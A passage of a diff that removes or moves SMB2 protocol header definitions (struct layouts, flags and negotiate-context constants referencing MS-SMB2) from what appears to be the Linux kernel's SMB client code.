+-#define SMB2_ERROR_STRUCTURE_SIZE2	9
+-#define SMB2_ERROR_STRUCTURE_SIZE2_LE	cpu_to_le16(SMB2_ERROR_STRUCTURE_SIZE2)
+-
+-struct smb2_err_rsp {
+-	struct smb2_hdr hdr;
+-	__le16 StructureSize;
+-	__u8   ErrorContextCount;
+-	__u8   Reserved;
+-	__le32 ByteCount;  /* even if zero, at least one byte follows */
+-	__u8   ErrorData[1];  /* variable length */
+-} __packed;
+-
+-#define SMB3_AES_CCM_NONCE 11
+-#define SMB3_AES_GCM_NONCE 12
+-
+-/* Transform flags (for 3.0 dialect this flag indicates CCM) */
+-#define TRANSFORM_FLAG_ENCRYPTED	0x0001
+-struct smb2_transform_hdr {
+-	__le32 ProtocolId;	/* 0xFD 'S' 'M' 'B' */
+-	__u8   Signature[16];
+-	__u8   Nonce[16];
+-	__le32 OriginalMessageSize;
+-	__u16  Reserved1;
+-	__le16 Flags; /* EncryptionAlgorithm for 3.0, enc enabled for 3.1.1 */
+-	__le64  SessionId;
+-} __packed;
+-
+-
+-/* See MS-SMB2 2.2.42 */
+-struct smb2_compression_transform_hdr_unchained {
+-	__le32 ProtocolId;	/* 0xFC 'S' 'M' 'B' */
+-	__le32 OriginalCompressedSegmentSize;
+-	__le16 CompressionAlgorithm;
+-	__le16 Flags;
+-	__le16 Length; /* if chained it is length, else offset */
+-} __packed;
+-
+-/* See MS-SMB2 2.2.42.1 */
+-#define SMB2_COMPRESSION_FLAG_NONE	0x0000
+-#define SMB2_COMPRESSION_FLAG_CHAINED	0x0001
+-
+-struct compression_payload_header {
+-	__le16	CompressionAlgorithm;
+-	__le16	Flags;
+-	__le32	Length; /* length of compressed payload including field below if present */
+-	/* __le32 OriginalPayloadSize; */ /* optional, present when LZNT1, LZ77, LZ77+Huffman */
+-} __packed;
+-
+-/* See MS-SMB2 2.2.42.2 */
+-struct smb2_compression_transform_hdr_chained {
+-	__le32 ProtocolId;	/* 0xFC 'S' 'M' 'B' */
+-	__le32 OriginalCompressedSegmentSize;
+-	/* struct compression_payload_header[] */
+-} __packed;
+-
+-/* See MS-SMB2 2.2.42.2.2 */
+-struct compression_pattern_payload_v1 {
+-	__le16	Pattern;
+-	__le16	Reserved1;
+-	__le16	Reserved2;
+-	__le32	Repetitions;
+-} __packed;
+-
+-/* See MS-SMB2 section 2.2.9.2 */
+-/* Context Types */
+-#define SMB2_RESERVED_TREE_CONNECT_CONTEXT_ID 0x0000
+-#define SMB2_REMOTED_IDENTITY_TREE_CONNECT_CONTEXT_ID cpu_to_le16(0x0001)
+-
+-struct tree_connect_contexts {
+-	__le16 ContextType;
+-	__le16 DataLength;
+-	__le32 Reserved;
+-	__u8   Data[];
+-} __packed;
+-
+-/* Remoted identity tree connect context structures - see MS-SMB2 2.2.9.2.1 */
+-struct smb3_blob_data {
+-	__le16 BlobSize;
+-	__u8   BlobData[];
+-} __packed;
+-
+-/* Valid values for Attr */
+-#define SE_GROUP_MANDATORY		0x00000001
+-#define SE_GROUP_ENABLED_BY_DEFAULT	0x00000002
+-#define SE_GROUP_ENABLED		0x00000004
+-#define SE_GROUP_OWNER			0x00000008
+-#define SE_GROUP_USE_FOR_DENY_ONLY	0x00000010
+-#define SE_GROUP_INTEGRITY		0x00000020
+-#define SE_GROUP_INTEGRITY_ENABLED	0x00000040
+-#define SE_GROUP_RESOURCE		0x20000000
+-#define SE_GROUP_LOGON_ID		0xC0000000
+-
+-/* struct sid_attr_data is SidData array in BlobData format then le32 Attr */
+-
+-struct sid_array_data {
+-	__le16 SidAttrCount;
+-	/* SidAttrList - array of sid_attr_data structs */
+-} __packed;
+-
+-struct luid_attr_data {
+-
+-} __packed;
+-
+-/*
+- * struct privilege_data is the same as BLOB_DATA - see MS-SMB2 2.2.9.2.1.5
+- * but with size of LUID_ATTR_DATA struct and BlobData set to LUID_ATTR_DATA
+- */
+-
+-struct privilege_array_data {
+-	__le16 PrivilegeCount;
+-	/* array of privilege_data structs */
+-} __packed;
+-
+-struct remoted_identity_tcon_context {
+-	__le16 TicketType; /* must be 0x0001 */
+-	__le16 TicketSize; /* total size of this struct */
+-	__le16 User; /* offset to SID_ATTR_DATA struct with user info */
+-	__le16 UserName; /* offset to null terminated Unicode username string */
+-	__le16 Domain; /* offset to null terminated Unicode domain name */
+-	__le16 Groups; /* offset to SID_ARRAY_DATA struct with group info */
+-	__le16 RestrictedGroups; /* similar to above */
+-	__le16 Privileges; /* offset to PRIVILEGE_ARRAY_DATA struct */
+-	__le16 PrimaryGroup; /* offset to SID_ARRAY_DATA struct */
+-	__le16 Owner; /* offset to BLOB_DATA struct */
+-	__le16 DefaultDacl; /* offset to BLOB_DATA struct */
+-	__le16 DeviceGroups; /* offset to SID_ARRAY_DATA struct */
+-	__le16 UserClaims; /* offset to BLOB_DATA struct */
+-	__le16 DeviceClaims; /* offset to BLOB_DATA struct */
+-	__u8   TicketInfo[]; /* variable length buf - remoted identity data */
+-} __packed;
+-
+-struct smb2_tree_connect_req_extension {
+-	__le32 TreeConnectContextOffset;
+-	__le16 TreeConnectContextCount;
+-	__u8  Reserved[10];
+-	__u8  PathName[]; /* variable sized array */
+-	/* followed by array of TreeConnectContexts */
+-} __packed;
+-
+-/* Flags/Reserved for SMB3.1.1 */
+-#define SMB2_TREE_CONNECT_FLAG_CLUSTER_RECONNECT cpu_to_le16(0x0001)
+-#define SMB2_TREE_CONNECT_FLAG_REDIRECT_TO_OWNER cpu_to_le16(0x0002)
+-#define SMB2_TREE_CONNECT_FLAG_EXTENSION_PRESENT cpu_to_le16(0x0004)
+-
+-struct smb2_tree_connect_req {
+-	struct smb2_hdr hdr;
+-	__le16 StructureSize;	/* Must be 9 */
+-	__le16 Flags;		/* Flags in SMB3.1.1 */
+-	__le16 PathOffset;
+-	__le16 PathLength;
+-	__u8   Buffer[1];	/* variable length */
+-} __packed;
+-
+-/* Possible ShareType values */
+-#define SMB2_SHARE_TYPE_DISK	0x01
+-#define SMB2_SHARE_TYPE_PIPE	0x02
+-#define	SMB2_SHARE_TYPE_PRINT	0x03
+-
+-/*
+- * Possible ShareFlags - exactly one of the first 4 caching flags must be
+- * set (any of the remaining SHI1005 flags may be set individually or in
+- * combination).
+- */
+-#define SMB2_SHAREFLAG_MANUAL_CACHING			0x00000000
+-#define SMB2_SHAREFLAG_AUTO_CACHING			0x00000010
+-#define SMB2_SHAREFLAG_VDO_CACHING			0x00000020
+-#define SMB2_SHAREFLAG_NO_CACHING			0x00000030
+-#define SHI1005_FLAGS_DFS				0x00000001
+-#define SHI1005_FLAGS_DFS_ROOT				0x00000002
+-#define SHI1005_FLAGS_RESTRICT_EXCLUSIVE_OPENS		0x00000100
+-#define SHI1005_FLAGS_FORCE_SHARED_DELETE		0x00000200
+-#define SHI1005_FLAGS_ALLOW_NAMESPACE_CACHING		0x00000400
+-#define SHI1005_FLAGS_ACCESS_BASED_DIRECTORY_ENUM	0x00000800
+-#define SHI1005_FLAGS_FORCE_LEVELII_OPLOCK		0x00001000
+-#define SHI1005_FLAGS_ENABLE_HASH_V1			0x00002000
+-#define SHI1005_FLAGS_ENABLE_HASH_V2			0x00004000
+-#define SHI1005_FLAGS_ENCRYPT_DATA			0x00008000
+-#define SMB2_SHAREFLAG_IDENTITY_REMOTING		0x00040000 /* 3.1.1 */
+-#define SMB2_SHAREFLAG_COMPRESS_DATA			0x00100000 /* 3.1.1 */
+-#define SHI1005_FLAGS_ALL				0x0014FF33
+-
+-/* Possible share capabilities */
+-#define SMB2_SHARE_CAP_DFS	cpu_to_le32(0x00000008) /* all dialects */
+-#define SMB2_SHARE_CAP_CONTINUOUS_AVAILABILITY cpu_to_le32(0x00000010) /* 3.0 */
+-#define SMB2_SHARE_CAP_SCALEOUT	cpu_to_le32(0x00000020) /* 3.0 */
+-#define SMB2_SHARE_CAP_CLUSTER	cpu_to_le32(0x00000040) /* 3.0 */
+-#define SMB2_SHARE_CAP_ASYMMETRIC cpu_to_le32(0x00000080) /* 3.02 */
+-#define SMB2_SHARE_CAP_REDIRECT_TO_OWNER cpu_to_le32(0x00000100) /* 3.1.1 */
+-
+-struct smb2_tree_connect_rsp {
+-	struct smb2_hdr hdr;
+-	__le16 StructureSize;	/* Must be 16 */
+-	__u8   ShareType;	/* see below */
+-	__u8   Reserved;
+-	__le32 ShareFlags;	/* see below */
+-	__le32 Capabilities;	/* see below */
+-	__le32 MaximalAccess;
+-} __packed;
+-
+-struct smb2_tree_disconnect_req {
+-	struct smb2_hdr hdr;
+-	__le16 StructureSize;	/* Must be 4 */
+-	__le16 Reserved;
+-} __packed;
+-
+-struct smb2_tree_disconnect_rsp {
+-	struct smb2_hdr hdr;
+-	__le16 StructureSize;	/* Must be 4 */
+-	__le16 Reserved;
+-} __packed;
+-
+-
+-/*
+- * SMB2_NEGOTIATE_PROTOCOL  See MS-SMB2 section 2.2.3
+- */
+-/* SecurityMode flags */
+-#define	SMB2_NEGOTIATE_SIGNING_ENABLED     0x0001
+-#define	SMB2_NEGOTIATE_SIGNING_ENABLED_LE  cpu_to_le16(0x0001)
+-#define SMB2_NEGOTIATE_SIGNING_REQUIRED	   0x0002
+-#define SMB2_NEGOTIATE_SIGNING_REQUIRED_LE cpu_to_le16(0x0002)
+-#define SMB2_SEC_MODE_FLAGS_ALL            0x0003
+-
+-/* Capabilities flags */
+-#define SMB2_GLOBAL_CAP_DFS		0x00000001
+-#define SMB2_GLOBAL_CAP_LEASING		0x00000002 /* Resp only New to SMB2.1 */
+-#define SMB2_GLOBAL_CAP_LARGE_MTU	0x00000004 /* Resp only New to SMB2.1 */
+-#define SMB2_GLOBAL_CAP_MULTI_CHANNEL	0x00000008 /* New to SMB3 */
+-#define SMB2_GLOBAL_CAP_PERSISTENT_HANDLES 0x00000010 /* New to SMB3 */
+-#define SMB2_GLOBAL_CAP_DIRECTORY_LEASING  0x00000020 /* New to SMB3 */
+-#define SMB2_GLOBAL_CAP_ENCRYPTION	0x00000040 /* New to SMB3 */
+-/* Internal types */
+-#define SMB2_NT_FIND			0x00100000
+-#define SMB2_LARGE_FILES		0x00200000
+-
+-#define SMB2_CLIENT_GUID_SIZE		16
+-#define SMB2_CREATE_GUID_SIZE		16
+-
+-/* Dialects */
+-#define SMB10_PROT_ID  0x0000 /* local only, not sent on wire w/CIFS negprot */
+-#define SMB20_PROT_ID  0x0202
+-#define SMB21_PROT_ID  0x0210
+-#define SMB2X_PROT_ID  0x02FF
+-#define SMB30_PROT_ID  0x0300
+-#define SMB302_PROT_ID 0x0302
+-#define SMB311_PROT_ID 0x0311
+-#define BAD_PROT_ID    0xFFFF
+-
+-#define SMB311_SALT_SIZE			32
+-/* Hash Algorithm Types */
+-#define SMB2_PREAUTH_INTEGRITY_SHA512	cpu_to_le16(0x0001)
+-#define SMB2_PREAUTH_HASH_SIZE 64
+-
+-/* Negotiate Contexts - ContextTypes. See MS-SMB2 section 2.2.3.1 for details */
+-#define SMB2_PREAUTH_INTEGRITY_CAPABILITIES	cpu_to_le16(1)
+-#define SMB2_ENCRYPTION_CAPABILITIES		cpu_to_le16(2)
+-#define SMB2_COMPRESSION_CAPABILITIES		cpu_to_le16(3)
+-#define SMB2_NETNAME_NEGOTIATE_CONTEXT_ID	cpu_to_le16(5)
+-#define SMB2_TRANSPORT_CAPABILITIES		cpu_to_le16(6)
+-#define SMB2_RDMA_TRANSFORM_CAPABILITIES	cpu_to_le16(7)
+-#define SMB2_SIGNING_CAPABILITIES		cpu_to_le16(8)
+-#define SMB2_POSIX_EXTENSIONS_AVAILABLE		cpu_to_le16(0x100)
+-
+-struct smb2_neg_context {
+-	__le16	ContextType;
+-	__le16	DataLength;
+-	__le32	Reserved;
+-	/* Followed by array of data. NOTE: some servers require padding to 8 byte boundary */
+-} __packed;
+-
+-/*
+- * SaltLength that the server sends can be zero, so the only three required
+- * fields (all __le16) end up six bytes total, so the minimum context data len
+- * in the response is six bytes which accounts for
+- *
+- *      HashAlgorithmCount, SaltLength, and 1 HashAlgorithm.
+- */
+-#define MIN_PREAUTH_CTXT_DATA_LEN 6
+-
+-struct smb2_preauth_neg_context {
+-	__le16	ContextType; /* 1 */
+-	__le16	DataLength;
+-	__le32	Reserved;
+-	__le16	HashAlgorithmCount; /* 1 */
+-	__le16	SaltLength;
+-	__le16	HashAlgorithms; /* HashAlgorithms[0] since only one defined */
+-	__u8	Salt[SMB311_SALT_SIZE];
+-} __packed;
+-
+-/* Encryption Algorithms Ciphers */
+-#define SMB2_ENCRYPTION_AES128_CCM	cpu_to_le16(0x0001)
+-#define SMB2_ENCRYPTION_AES128_GCM	cpu_to_le16(0x0002)
+-#define SMB2_ENCRYPTION_AES256_CCM      cpu_to_le16(0x0003)
+-#define SMB2_ENCRYPTION_AES256_GCM      cpu_to_le16(0x0004)
+-
+-/* Min encrypt context data is one cipher so 2 bytes + 2 byte count field */
+-#define MIN_ENCRYPT_CTXT_DATA_LEN	4
+-struct smb2_encryption_neg_context {
+-	__le16	ContextType; /* 2 */
+-	__le16	DataLength;
+-	__le32	Reserved;
+-	/* CipherCount usually 2, but can be 3 when AES256-GCM enabled */
+-	__le16	CipherCount; /* AES128-GCM and AES128-CCM by default */
+-	__le16	Ciphers[];
+-} __packed;
+-
+-/* See MS-SMB2 2.2.3.1.3 */
+-#define SMB3_COMPRESS_NONE	cpu_to_le16(0x0000)
+-#define SMB3_COMPRESS_LZNT1	cpu_to_le16(0x0001)
+-#define SMB3_COMPRESS_LZ77	cpu_to_le16(0x0002)
+-#define SMB3_COMPRESS_LZ77_HUFF	cpu_to_le16(0x0003)
+-/* Pattern scanning algorithm See MS-SMB2 3.1.4.4.1 */
+-#define SMB3_COMPRESS_PATTERN	cpu_to_le16(0x0004) /* Pattern_V1 */
+-
+-/* Compression Flags */
+-#define SMB2_COMPRESSION_CAPABILITIES_FLAG_NONE		cpu_to_le32(0x00000000)
+-#define SMB2_COMPRESSION_CAPABILITIES_FLAG_CHAINED	cpu_to_le32(0x00000001)
+-
+-struct smb2_compression_capabilities_context {
+-	__le16	ContextType; /* 3 */
+-	__le16  DataLength;
+-	__le32	Reserved;
+-	__le16	CompressionAlgorithmCount;
+-	__le16	Padding;
+-	__le32	Flags;
+-	__le16	CompressionAlgorithms[3];
+-	__u16	Pad;  /* Some servers require pad to DataLen multiple of 8 */
+-	/* Check if pad needed */
+-} __packed;
+-
+-/*
+- * For smb2_netname_negotiate_context_id See MS-SMB2 2.2.3.1.4.
+- * Its struct simply contains NetName, an array of Unicode characters
+- */
+-struct smb2_netname_neg_context {
+-	__le16	ContextType; /* 5 */
+-	__le16	DataLength;
+-	__le32	Reserved;
+-	__le16	NetName[]; /* hostname of target converted to UCS-2 */
+-} __packed;
+-
+-/*
+- * For smb2_transport_capabilities context see MS-SMB2 2.2.3.1.5
+- * and 2.2.4.1.5
+- */
+-
+-/* Flags */
+-#define SMB2_ACCEPT_TRANSPORT_LEVEL_SECURITY	0x00000001
+-
+-struct smb2_transport_capabilities_context {
+-	__le16	ContextType; /* 6 */
+-	__le16  DataLength;
+-	__u32	Reserved;
+-	__le32	Flags;
+-	__u32	Pad;
+-} __packed;
+-
+-/*
+- * For rdma transform capabilities context see MS-SMB2 2.2.3.1.6
+- * and 2.2.4.1.6
+- */
+-
+-/* RDMA Transform IDs */
+-#define SMB2_RDMA_TRANSFORM_NONE	0x0000
+-#define SMB2_RDMA_TRANSFORM_ENCRYPTION	0x0001
+-#define SMB2_RDMA_TRANSFORM_SIGNING	0x0002
+-
+-struct smb2_rdma_transform_capabilities_context {
+-	__le16	ContextType; /* 7 */
+-	__le16  DataLength;
+-	__u32	Reserved;
+-	__le16	TransformCount;
+-	__u16	Reserved1;
+-	__u32	Reserved2;
+-	__le16	RDMATransformIds[];
+-} __packed;
+-
+-/*
+- * For signing capabilities context see MS-SMB2 2.2.3.1.7
+- * and 2.2.4.1.7
+- */
+-
+-/* Signing algorithms */
+-#define SIGNING_ALG_HMAC_SHA256    0
+-#define SIGNING_ALG_HMAC_SHA256_LE cpu_to_le16(0)
+-#define SIGNING_ALG_AES_CMAC       1
+-#define SIGNING_ALG_AES_CMAC_LE    cpu_to_le16(1)
+-#define SIGNING_ALG_AES_GMAC       2
+-#define SIGNING_ALG_AES_GMAC_LE    cpu_to_le16(2)
+-
+-struct smb2_signing_capabilities {
+-	__le16	ContextType; /* 8 */
+-	__le16	DataLength;
+-	__le32	Reserved;
+-	__le16	SigningAlgorithmCount;
+-	__le16	SigningAlgorithms[];
+-	/*  Followed by padding to 8 byte boundary (required by some servers) */
+-} __packed;
+-
+-#define POSIX_CTXT_DATA_LEN	16
+-struct smb2_posix_neg_context {
+-	__le16	ContextType; /* 0x100 */
+-	__le16	DataLength;
+-	__le32	Reserved;
+-	__u8	Name[16]; /* POSIX ctxt GUID 93AD25509CB411E7B42383DE968BCD7C */
+-} __packed;
+-
+-struct smb2_negotiate_req {
+-	struct smb2_hdr hdr;
+-	__le16 StructureSize; /* Must be 36 */
+-	__le16 DialectCount;
+-	__le16 SecurityMode;
+-	__le16 Reserved;	/* MBZ */
+-	__le32 Capabilities;
+-	__u8   ClientGUID[SMB2_CLIENT_GUID_SIZE];
+-	/* In SMB3.02 and earlier next three were MBZ le64 ClientStartTime */
+-	__le32 NegotiateContextOffset; /* SMB3.1.1 only. MBZ earlier */
+-	__le16 NegotiateContextCount;  /* SMB3.1.1 only. MBZ earlier */
+-	__le16 Reserved2;
+-	__le16 Dialects[];
+-} __packed;
+-
+-struct smb2_negotiate_rsp {
+-	struct smb2_hdr hdr;
+-	__le16 StructureSize;	/* Must be 65 */
+-	__le16 SecurityMode;
+-	__le16 DialectRevision;
+-	__le16 NegotiateContextCount;	/* Prior to SMB3.1.1 was Reserved & MBZ */
+-	__u8   ServerGUID[16];
+-	__le32 Capabilities;
+-	__le32 MaxTransactSize;
+-	__le32 MaxReadSize;
+-	__le32 MaxWriteSize;
+-	__le64 SystemTime;	/* MBZ */
+-	__le64 ServerStartTime;
+-	__le16 SecurityBufferOffset;
+-	__le16 SecurityBufferLength;
+-	__le32 NegotiateContextOffset;	/* Pre:SMB3.1.1 was reserved/ignored */
+-	__u8   Buffer[1];	/* variable length GSS security buffer */
+-} __packed;
+-
+-
+-/*
+- * SMB2_SESSION_SETUP  See MS-SMB2 section 2.2.5
+- */
+-/* Flags */
+-#define SMB2_SESSION_REQ_FLAG_BINDING		0x01
+-#define SMB2_SESSION_REQ_FLAG_ENCRYPT_DATA	0x04
+-
+-struct smb2_sess_setup_req {
+-	struct smb2_hdr hdr;
+-	__le16 StructureSize; /* Must be 25 */
+-	__u8   Flags;
+-	__u8   SecurityMode;
+-	__le32 Capabilities;
+-	__le32 Channel;
+-	__le16 SecurityBufferOffset;
+-	__le16 SecurityBufferLength;
+-	__le64 PreviousSessionId;
+-	__u8   Buffer[1];	/* variable length GSS security buffer */
+-} __packed;
+-
+-/* Currently defined SessionFlags */
+-#define SMB2_SESSION_FLAG_IS_GUEST        0x0001
+-#define SMB2_SESSION_FLAG_IS_GUEST_LE     cpu_to_le16(0x0001)
+-#define SMB2_SESSION_FLAG_IS_NULL         0x0002
+-#define SMB2_SESSION_FLAG_IS_NULL_LE      cpu_to_le16(0x0002)
+-#define SMB2_SESSION_FLAG_ENCRYPT_DATA    0x0004
+-#define SMB2_SESSION_FLAG_ENCRYPT_DATA_LE cpu_to_le16(0x0004)
+-
+-struct smb2_sess_setup_rsp {
+-	struct smb2_hdr hdr;
+-	__le16 StructureSize; /* Must be 9 */
+-	__le16 SessionFlags;
+-	__le16 SecurityBufferOffset;
+-	__le16 SecurityBufferLength;
+-	__u8   Buffer[1];	/* variable length GSS security buffer */
+-} __packed;
+-
+-
+-/*
+- * SMB2_LOGOFF  See MS-SMB2 section 2.2.7
+- */
+-struct smb2_logoff_req {
+-	struct smb2_hdr hdr;
+-	__le16 StructureSize;	/* Must be 4 */
+-	__le16 Reserved;
+-} __packed;
+-
+-struct smb2_logoff_rsp {
+-	struct smb2_hdr hdr;
+-	__le16 StructureSize;	/* Must be 4 */
+-	__le16 Reserved;
+-} __packed;
+-
+-
+-/*
+- * SMB2_CLOSE  See MS-SMB2 section 2.2.15
+- */
+-/* Currently defined values for close flags */
+-#define SMB2_CLOSE_FLAG_POSTQUERY_ATTRIB	cpu_to_le16(0x0001)
+-struct smb2_close_req {
+-	struct smb2_hdr hdr;
+-	__le16 StructureSize;	/* Must be 24 */
+-	__le16 Flags;
+-	__le32 Reserved;
+-	__u64  PersistentFileId; /* opaque endianness */
+-	__u64  VolatileFileId; /* opaque endianness */
+-} __packed;
+-
+-/*
+- * Maximum size of a SMB2_CLOSE response is 64 (smb2 header) + 60 (data)
+- */
+-#define MAX_SMB2_CLOSE_RESPONSE_SIZE 124
+-
+-struct smb2_close_rsp {
+-	struct smb2_hdr hdr;
+-	__le16 StructureSize; /* 60 */
+-	__le16 Flags;
+-	__le32 Reserved;
+-	__le64 CreationTime;
+-	__le64 LastAccessTime;
+-	__le64 LastWriteTime;
+-	__le64 ChangeTime;
+-	__le64 AllocationSize;	/* Beginning of FILE_STANDARD_INFO equivalent */
+-	__le64 EndOfFile;
+-	__le32 Attributes;
+-} __packed;
+-
+-
+-/*
+- * SMB2_READ  See MS-SMB2 section 2.2.19
+- */
+-/* For read request Flags field below, following flag is defined for SMB3.02 */
+-#define SMB2_READFLAG_READ_UNBUFFERED	0x01
+-#define SMB2_READFLAG_REQUEST_COMPRESSED 0x02 /* See MS-SMB2 2.2.19 */
+-
+-/* Channel field for read and write: exactly one of following flags can be set*/
+-#define SMB2_CHANNEL_NONE               cpu_to_le32(0x00000000)
+-#define SMB2_CHANNEL_RDMA_V1            cpu_to_le32(0x00000001)
+-#define SMB2_CHANNEL_RDMA_V1_INVALIDATE cpu_to_le32(0x00000002)
+-#define SMB2_CHANNEL_RDMA_TRANSFORM     cpu_to_le32(0x00000003)
+-
+-/* SMB2 read request without RFC1001 length at the beginning */
+-struct smb2_read_req {
+-	struct smb2_hdr hdr;
+-	__le16 StructureSize; /* Must be 49 */
+-	__u8   Padding; /* offset from start of SMB2 header to place read */
+-	__u8   Flags; /* MBZ unless SMB3.02 or later */
+-	__le32 Length;
+-	__le64 Offset;
+-	__u64  PersistentFileId;
+-	__u64  VolatileFileId;
+-	__le32 MinimumCount;
+-	__le32 Channel; /* MBZ except for SMB3 or later */
+-	__le32 RemainingBytes;
+-	__le16 ReadChannelInfoOffset;
+-	__le16 ReadChannelInfoLength;
+-	__u8   Buffer[1];
+-} __packed;
+-
+-/* Read flags */
+-#define SMB2_READFLAG_RESPONSE_NONE            cpu_to_le32(0x00000000)
+-#define SMB2_READFLAG_RESPONSE_RDMA_TRANSFORM  cpu_to_le32(0x00000001)
+-
+-struct smb2_read_rsp {
+-	struct smb2_hdr hdr;
+-	__le16 StructureSize; /* Must be 17 */
+-	__u8   DataOffset;
+-	__u8   Reserved;
+-	__le32 DataLength;
+-	__le32 DataRemaining;
+-	__le32 Flags;
+-	__u8   Buffer[1];
+-} __packed;
+-
+-
+-/*
+- * SMB2_WRITE  See MS-SMB2 section 2.2.21
+- */
+-/* For write request Flags field below the following flags are defined: */
+-#define SMB2_WRITEFLAG_WRITE_THROUGH	0x00000001	/* SMB2.1 or later */
+-#define SMB2_WRITEFLAG_WRITE_UNBUFFERED	0x00000002	/* SMB3.02 or later */
+-
+-struct smb2_write_req {
+-	struct smb2_hdr hdr;
+-	__le16 StructureSize; /* Must be 49 */
+-	__le16 DataOffset; /* offset from start of SMB2 header to write data */
+-	__le32 Length;
+-	__le64 Offset;
+-	__u64  PersistentFileId; /* opaque endianness */
+-	__u64  VolatileFileId; /* opaque endianness */
+-	__le32 Channel; /* MBZ unless SMB3.02 or later */
+-	__le32 RemainingBytes;
+-	__le16 WriteChannelInfoOffset;
+-	__le16 WriteChannelInfoLength;
+-	__le32 Flags;
+-	__u8   Buffer[1];
+-} __packed;
+-
+-struct smb2_write_rsp {
+-	struct smb2_hdr hdr;
+-	__le16 StructureSize; /* Must be 17 */
+-	__u8   DataOffset;
+-	__u8   Reserved;
+-	__le32 DataLength;
+-	__le32 DataRemaining;
+-	__u32  Reserved2;
+-	__u8   Buffer[1];
+-} __packed;
+-
+-
+-/*
+- * SMB2_FLUSH  See MS-SMB2 section 2.2.17
+- */
+-struct smb2_flush_req {
+-	struct smb2_hdr hdr;
+-	__le16 StructureSize;	/* Must be 24 */
+-	__le16 Reserved1;
+-	__le32 Reserved2;
+-	__u64  PersistentFileId;
+-	__u64  VolatileFileId;
+-} __packed;
+-
+-struct smb2_flush_rsp {
+-	struct smb2_hdr hdr;
+-	__le16 StructureSize;
+-	__le16 Reserved;
+-} __packed;
+-
+-#define SMB2_LOCKFLAG_SHARED		0x0001
+-#define SMB2_LOCKFLAG_EXCLUSIVE		0x0002
+-#define SMB2_LOCKFLAG_UNLOCK		0x0004
+-#define SMB2_LOCKFLAG_FAIL_IMMEDIATELY	0x0010
+-#define SMB2_LOCKFLAG_MASK		0x0007
+-
+-struct smb2_lock_element {
+-	__le64 Offset;
+-	__le64 Length;
+-	__le32 Flags;
+-	__le32 Reserved;
+-} __packed;
+-
+-struct smb2_lock_req {
+-	struct smb2_hdr hdr;
+-	__le16 StructureSize; /* Must be 48 */
+-	__le16 LockCount;
+-	/*
+-	 * The least significant four bits are the index, the other 28 bits are
+-	 * the lock sequence number (0 to 64). See MS-SMB2 2.2.26
+-	 */
+-	__le32 LockSequenceNumber;
+-	__u64  PersistentFileId;
+-	__u64  VolatileFileId;
+-	/* Followed by at least one */
+-	struct smb2_lock_element locks[1];
+-} __packed;
+-
+-struct smb2_lock_rsp {
+-	struct smb2_hdr hdr;
+-	__le16 StructureSize; /* Must be 4 */
+-	__le16 Reserved;
+-} __packed;
+-
+-struct smb2_echo_req {
+-	struct smb2_hdr hdr;
+-	__le16 StructureSize;	/* Must be 4 */
+-	__u16  Reserved;
+-} __packed;
+-
+-struct smb2_echo_rsp {
+-	struct smb2_hdr hdr;
+-	__le16 StructureSize;	/* Must be 4 */
+-	__u16  Reserved;
+-} __packed;
+-
+-/*
+- * Valid FileInformation classes for query directory
+- *
+- * Note that these are a subset of the (file) QUERY_INFO levels defined
+- * later in this file (but since QUERY_DIRECTORY uses equivalent numbers
+- * we do not redefine them here)
+- *
+- * FileDirectoryInformation		0x01
+- * FileFullDirectoryInformation		0x02
+- * FileIdFullDirectoryInformation	0x26
+- * FileBothDirectoryInformation		0x03
+- * FileIdBothDirectoryInformation	0x25
+- * FileNamesInformation			0x0C
+- * FileIdExtdDirectoryInformation	0x3C
+- */
+-
+-/* search (query_directory) Flags field */
+-#define SMB2_RESTART_SCANS		0x01
+-#define SMB2_RETURN_SINGLE_ENTRY	0x02
+-#define SMB2_INDEX_SPECIFIED		0x04
+-#define SMB2_REOPEN			0x10
+-
+-struct smb2_query_directory_req {
+-	struct smb2_hdr hdr;
+-	__le16 StructureSize; /* Must be 33 */
+-	__u8   FileInformationClass;
+-	__u8   Flags;
+-	__le32 FileIndex;
+-	__u64  PersistentFileId;
+-	__u64  VolatileFileId;
+-	__le16 FileNameOffset;
+-	__le16 FileNameLength;
+-	__le32 OutputBufferLength;
+-	__u8   Buffer[1];
+-} __packed;
+-
+-struct smb2_query_directory_rsp {
+-	struct smb2_hdr hdr;
+-	__le16 StructureSize; /* Must be 9 */
+-	__le16 OutputBufferOffset;
+-	__le32 OutputBufferLength;
+-	__u8   Buffer[1];
+-} __packed;
+-
+-/*
+- * Maximum number of iovs we need for a set-info request.
+- * The largest one is rename/hardlink
+- * [0] : struct smb2_set_info_req + smb2_file_[rename|link]_info
+- * [1] : path
+- * [2] : compound padding
+- */
+-#define SMB2_SET_INFO_IOV_SIZE 3
+-
+-struct smb2_set_info_req {
+-	struct smb2_hdr hdr;
+-	__le16 StructureSize; /* Must be 33 */
+-	__u8   InfoType;
+-	__u8   FileInfoClass;
+-	__le32 BufferLength;
+-	__le16 BufferOffset;
+-	__u16  Reserved;
+-	__le32 AdditionalInformation;
+-	__u64  PersistentFileId;
+-	__u64  VolatileFileId;
+-	__u8   Buffer[1];
+-} __packed;
+-
+-struct smb2_set_info_rsp {
+-	struct smb2_hdr hdr;
+-	__le16 StructureSize; /* Must be 2 */
+-} __packed;
+-
+-/*
+- * SMB2_NOTIFY  See MS-SMB2 section 2.2.35
+- */
+-/* notify flags */
+-#define SMB2_WATCH_TREE			0x0001
+-
+-/* notify completion filter flags. See MS-FSCC 2.6 and MS-SMB2 2.2.35 */
+-#define FILE_NOTIFY_CHANGE_FILE_NAME		0x00000001
+-#define FILE_NOTIFY_CHANGE_DIR_NAME		0x00000002
+-#define FILE_NOTIFY_CHANGE_ATTRIBUTES		0x00000004
+-#define FILE_NOTIFY_CHANGE_SIZE			0x00000008
+-#define FILE_NOTIFY_CHANGE_LAST_WRITE		0x00000010
+-#define FILE_NOTIFY_CHANGE_LAST_ACCESS		0x00000020
+-#define FILE_NOTIFY_CHANGE_CREATION		0x00000040
+-#define FILE_NOTIFY_CHANGE_EA			0x00000080
+-#define FILE_NOTIFY_CHANGE_SECURITY		0x00000100
+-#define FILE_NOTIFY_CHANGE_STREAM_NAME		0x00000200
+-#define FILE_NOTIFY_CHANGE_STREAM_SIZE		0x00000400
+-#define FILE_NOTIFY_CHANGE_STREAM_WRITE		0x00000800
+-
+-/* SMB2 Notify Action Flags */
+-#define FILE_ACTION_ADDED                       0x00000001
+-#define FILE_ACTION_REMOVED                     0x00000002
+-#define FILE_ACTION_MODIFIED                    0x00000003
+-#define FILE_ACTION_RENAMED_OLD_NAME            0x00000004
+-#define FILE_ACTION_RENAMED_NEW_NAME            0x00000005
+-#define FILE_ACTION_ADDED_STREAM                0x00000006
